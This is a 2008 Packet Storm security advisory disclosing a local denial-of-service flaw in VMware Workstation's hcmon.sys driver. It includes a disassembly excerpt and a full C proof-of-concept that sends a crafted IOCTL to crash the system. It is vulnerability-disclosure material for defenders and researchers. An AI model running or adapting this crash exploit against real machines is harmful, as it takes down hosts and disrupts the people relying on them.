vmwarework-dos.txt

2008-08-18T00:00:00
ID PACKETSTORM:69192
Type packetstorm
Reporter g_
Modified 2008-08-18T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
- - Orange Bat advisory -  
  
Name : VMWare Workstation (hcmon.sys 6.0.0.45731)  
Class : DoS  
Published : 2008-08-17  
Credit : g_ (g_ # orange-bat # com)  
  
- - Details -  
  
Fails to sanitize pointers sent from usermode with METHOD_NEITHER.  
  
hcmon.sys:  
  
.text:00011606 loc_11606: .text:00011606 mov eax, [ebp+SystemBuffer]  
.text:00011609 mov [ebp+SystemBuffer2], eax  
.text:0001160C mov ecx, [ebp+SystemBuffer2]  
.text:0001160F mov edx, [ecx+0Ch] <---- BUGCHECK  
.text:00011612 cmp edx, [ebp+var_20]  
.text:00011615 jnz short loc_11629  
.text:00011617 cmp [ebp+NumberOfBytes], 70h  
.text:0001161B jb short loc_11629  
.text:0001161D mov eax, [ebp+SystemBuffer2]  
.text:00011620 cmp dword ptr [eax+8], 7FFBh  
.text:00011627 jbe short loc_11638  
  
This code can be reached by sending 0x8101232B IOCTL to \\.\hcmon  
device.  
  
- - Proof of concept -  
  
#include <windows.h>  
#include <stdio.h>  
#include <ddk/ntifs.h>  
  
  
void TextError(LPTSTR lpszFunction)  
{  
// Retrieve the system error message for the last-error code  
  
LPVOID lpMsgBuf;  
LPVOID lpDisplayBuf;  
DWORD dw = GetLastError();  
  
FormatMessage(  
FORMAT_MESSAGE_ALLOCATE_BUFFER |  
FORMAT_MESSAGE_FROM_SYSTEM |  
FORMAT_MESSAGE_IGNORE_INSERTS,  
NULL,  
dw,  
MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),  
(LPTSTR) &lpMsgBuf,  
0, NULL );  
  
// Display the error message and exit the process  
  
lpDisplayBuf = (LPVOID)LocalAlloc(LMEM_ZEROINIT,  
(lstrlen((LPCTSTR)lpMsgBuf)+lstrlen((LPCTSTR)lpszFunction)+40) \  
*sizeof(TCHAR));  
sprintf((LPTSTR)lpDisplayBuf,  
TEXT("%s failed with error %d: %s"),  
lpszFunction, dw, lpMsgBuf);  
//MessageBox(NULL, (LPCTSTR)lpDisplayBuf, TEXT("Error"), MB_OK);  
  
printf(lpDisplayBuf);  
  
LocalFree(lpMsgBuf);  
LocalFree(lpDisplayBuf);  
}  
  
  
BOOL TestIOCTL(PCHAR DeviceName, DWORD Ioctl, DWORD InputBuffer, \  
DWORD InputLen, DWORD OutputBuffer, DWORD OutputLen )  
{  
HANDLE hDevice; // handle to the drive to be examined  
BOOL bResult; // results flag  
DWORD junk; // discard results  
IO_STATUS_BLOCK IoStatusBlock;  
  
hDevice = CreateFile(DeviceName,  
0, // no access to the drive  
FILE_SHARE_READ | // share mode  
FILE_SHARE_WRITE,  
NULL, // default security attributes  
OPEN_EXISTING, // disposition  
0, // file attributes  
NULL); // do not copy file attributes  
  
if (hDevice == INVALID_HANDLE_VALUE) // cannot open the drive  
{  
TextError("CreateFile");  
return (FALSE);  
}  
  
  
bResult = DeviceIoControl(hDevice, // device to be queried  
Ioctl,  
(PVOID)InputBuffer,  
InputLen,  
(PVOID)OutputBuffer,  
OutputLen, // output buffer  
&junk, // # bytes returned  
(LPOVERLAPPED)NULL); // synchronous I/O  
  
  
if(!bResult){  
TextError("DeviceIoControl");  
}  
  
CloseHandle(hDevice);  
  
return TRUE;  
}  
  
int main(int argc, char *argv[])  
{  
DWORD Ioctl, Input, ILen, Output, OLen;  
DWORD SSDT;  
char *ptr;  
  
if(TestIOCTL("\\\\.\\hcmon", 0x8101232B, 0x80000001, 0, 0x80000002, 0)){  
printf("You should not see this");  
}  
else{  
printf("Failed to open device");  
}  
  
  
return 0;  
}  
  
  
- - PGP -  
  
All advisories from Orange Bat are signed. You can find our public  
key here: http://www.orange-bat.com/g_.asc  
  
- - Disclaimer -  
  
This document and all the information it contains is provided "as is",  
without any warranty. Orange Bat is not responsible for the  
misuse of the information provided in this advisory. The advisory is  
provided for educational purposes only.  
  
Permission is hereby granted to redistribute this advisory, providing  
that no changes are made and that the copyright notices and  
disclaimers remain intact.  
  
(c) 2008 www.orange-bat.com  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.9 (MingW32) - GPGshell v3.70  
  
iEYEARECAAYFAkioiW4ACgkQIUHRVUfOLgUQEQCdE1YYpJAUypShf5oStwMfbRRC  
BPMAniLYABIgCgxkZVSQAQawV060P4M8  
=cp6A  
-----END PGP SIGNATURE-----  
  
`